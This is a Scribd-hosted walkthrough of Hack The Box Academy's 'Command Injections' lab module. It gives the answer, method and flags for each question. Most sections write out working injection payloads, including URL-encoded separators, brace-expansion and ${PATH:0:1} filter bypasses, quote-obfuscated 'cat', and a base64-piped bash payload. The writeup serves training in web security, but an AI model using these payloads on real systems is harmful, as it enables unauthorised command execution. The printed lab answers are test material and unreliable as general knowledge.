Scribd
Upload
866 views11 pages

Command Injections

Uploaded by

qzombexzombe114
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
866 views11 pages

Command Injections

Uploaded by

qzombexzombe114
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 11

Command Injections:

Link to challenge: https://academy.hackthebox.com/module/109


(log in required)
Class: Tier II | Medium | Offensive

Exploitation
Detection:
Question: Try adding any of the injection operators after the ip in IP field. What
did the error message say (in English)?
Answer: Please match the requested format.
Method: lets open the target server website:
http://<target-IP>:<target-port>

Lets enter the input


127.0.0.1;
We get the input error.

Injecting Commands:
Question: Review the HTML source code of the page to find where the front-
end input validation is happening. On which line number is it?
Answer: 17
Method: lets open the page source code (right click the page  View Page
Source):

We can see the regex pattern the ip input can take.


Other Injection Operators:
Question: Try using the remaining three injection operators (new-line, &, |),
and see how each works and how the output differs. Which of them only
shows the output of the injected command?
Answer: |
Method: ‘|’ is a pipe, and unlike new-line and (‘\n’) ‘&’ does not adds any
additional output but works with the current input we get.
Lets open the ping request in burpsuite repeater (all about burpsuite repeater
can be found in ‘Using Web Proxies’ writeup – ‘Repeating Requests’ section
(page 5).
we will run each of the URL-encoded characters ‘\n’, ‘&’, ‘|’ in additional to the
IP, in the request body, followed with the command ‘whoami’:
(‘\n’ = %0a, ‘&’ = %26, ‘|’ = %7c)
Fow ‘127.0.0.1%7cwhoami’ we will get only the ‘whoami’ ouput:

For either ‘127.0.0.1%26whoami’ or ‘127.0.0.1%0awhoami’ we will get the


output of both the ping and ‘whoami’, or the output of the ping command only.
Filter Evasion
Identifying Filters:
Question: Try all other injection operators to see if any of them is not
blacklisted. Which of (new-line, &, |) is not blacklisted by the web application?
Answer: \n
Method: we will use the same burpsuite repeater encoded operations
technique from the previous section:
For ‘127.0.0.1%26’ or ‘127.0.0.1%7c’ we will get Invalid input:

But for ‘127.0.0.1%0a’:

We will get valid output.


Bypassing Space Filters:
Question: Use what you learned in this section to execute the command 'ls -la'.
What is the size of the 'index.php' file?
Answer: 1613
Method: continuing from last previous, we established we can execute
commands after the ‘%0a’ new line, lets check that for ‘127.0.0.1%0als’ on the
burpsuite repeater:

That’s a nice start, but we need ‘ls -la’.


Attempting to use outright space, or url-encoded space ‘%20’:

‘Invalid input’.
We will use insead the ‘Using Brace Expansion’ - which automatically adds
spaces between arguments wrapped between braces, in the format: ‘{ls,-la}’:
Bypassing Other Blacklisted Characters:
Question: Use what you learned in this section to find name of the user in the
'/home' folder. What user did you find?
Answer: 1nj3c70r
Method: continuing from where we left off – we will use the environment
variable ‘PATH’, and the ability to trim letters from it, for example – the linux
command:
echo $PATH

Prints all of this, so:


echo ${PATH:0:1}

Prints only the first charcter of the value, which is ‘/’. Which we will use to
bypass the restrictions that are in place to prevent the entry of ‘/’ – the pure or
the encoded form of which. We will of course will need the ‘/’ to get ls output
of ‘/home’. Lets do that on the burpsuite repeater with the input
‘127.0.0.1%0a{ls,${PATH:0:1}home}’:
Bypassing Blacklisted Commands:
Question: Use what you learned in this section find the content of flag.txt in
the home folder of the user you previously found.
Answer: HTB{b451c_f1l73r5_w0n7_570p_m3}
Method: continuing from where we left off – we will use the payload:
127.0.0.1%0a{c'a't,${PATH:0:1}home${PATH:0:1}1nj3c70r${PATH:
0:1}flag.txt}
Obfuscating the ‘cat’ with quotation marks in the middle of the word:
Advanced Command Obfuscation:
Question: Find the output of the following command using one of the
techniques you learned in this section: find /usr/share/ | grep root | grep
mysql | tail -n 1
Answer: /usr/share/mysql/debian_create_root_user.sql
Method: continuing from last section - we will have to base64 encode the
command:

*The -n in echo is to ignore/remove ‘\n’ at the end of the echoed string. *


We have the base64 encoded command. Let’s device the payload:
%0abash<<<$(base64%09-
d<<<ZmluZCAvdXNyL3NoYXJlLyB8IGdyZXAgcm9vdCB8IGdyZXAgbXlzcWwg
fCB0YWlsIC1uIDE=)
To be command injected, using our base64 original command.
Skills Assessment
Skills Assessment:
Question: What is the content of '/flag.txt'?
Answer: HTB{c0mm4nd3r_1nj3c70r}
Method: *note – the challenge took me several sessions to solve, so the target
IP and port will change throughout the screenshots. *
lets start via entering the target server website with burpsuite browser
(interceptor off):
http://<target-IP>:<target-port>

Lets login with the provided credentials ‘guest:guest’:

We get to a list of files in some directory, in a structure resembling ‘ls -l’ output
format. In addition is ‘tmp’ directory (which is empty), and some operations on
the file – such as content view, copy, move and download. We can also search a
file in real-time, and an advanced search:
The vulnerable operation is the ‘move’:
Lest get to move a random file from the main directory to the tmp directory:

 now we set the interceptor on:


Lets get to to the repeater:

Now, we will place the command injection in the ‘from’ parameter. The payload
will be the following:
%3bc'a't${IFS}${PATH:0:1}..${PATH:0:1}..${PATH:0:1}..${PATH:
0:1}..${PATH:0:1}flag.txt;
When sent, we will search the 2nd occurrence of the word ‘error’ in the
response for fast track of the error message, and the flag value with it:

The interpretation of the payload is ‘;cat /../../../flag.txt;’.


*note – after the solution I checked for other solutions – a possible extra use is
the use of ‘${LS_COLORS:10:1}’ as ‘;’. HOWEVER I DID NOT TEST IT. *

You might also like